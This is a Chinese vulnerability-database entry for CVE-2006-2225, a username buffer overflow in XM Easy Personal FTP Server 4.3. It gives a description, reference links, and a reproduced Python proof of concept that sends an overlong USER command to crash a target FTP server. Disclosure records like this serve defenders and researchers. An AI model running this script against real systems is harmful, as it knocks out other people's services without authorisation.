XM Easy Personal FTP Server 用户名认证 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110210 漏洞类型 缓冲区溢出
发布时间 2006-05-04 更新时间 2006-05-08
CVE编号 CVE-2006-2225 CNNVD-ID CNNVD-200605-115
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1748
https://cxsecurity.com/issue/WLB-2006050048
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-115
|漏洞详情
XMEasyPersonalFTPServer是一款简单易用的个人FTP服务器。XMEasyPersonalFTPServer在处理用户连接到服务器时所提供的用户名时存在溢出漏洞,允许用户通过一些命令向缓冲区传送超长的参数,成功利用这个漏洞的攻击者可以远程执行任意指令。
|漏洞EXP
##############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# ahmed@rewterz.com                                          #
##############################################################

import socket
import struct
import time
import sys


buff='USER '+'A'*5000+'\r\n'

if len(sys.argv)!=3:
	print "[+] Usage: %s <ip> <port> \n" %sys.argv[0]
	sys.exit(0)

try:
	
        print "[+] Connecting to %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print "[+] Sending Evil buffer"
	time.sleep(1)
	s.send(buff)
        print "[+] Service Crashed"
        s.recv(1024)
	
except:
	print "[+] Could Not Connect To ftp server"

# milw0rm.com [2006-05-04]
|参考资料

来源:BID
名称:17836
链接:http://www.securityfocus.com/bid/17836
来源:BUGTRAQ
名称:20060504[REWTERZ-20060503]XMEasyPersonalFTPServerRemoteBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/432960/100/0/threaded
来源:XF
名称:xm-ftp-username-bo(26256)
链接:http://xforce.iss.net/xforce/xfdb/26256
来源:OSVDB
名称:25314
链接:http://www.osvdb.org/25314
来源:OSVDB
名称:25277
链接:http://www.osvdb.org/25277
来源:VUPEN
名称:ADV-2006-1673
链接:http://www.frsirt.com/english/advisories/2006/1673
来源:SREASON
名称:851
链接:http://securityreason.com/securityalert/851
来源:SECUNIA
名称:19970
链接:http://secunia.com/advisories/19970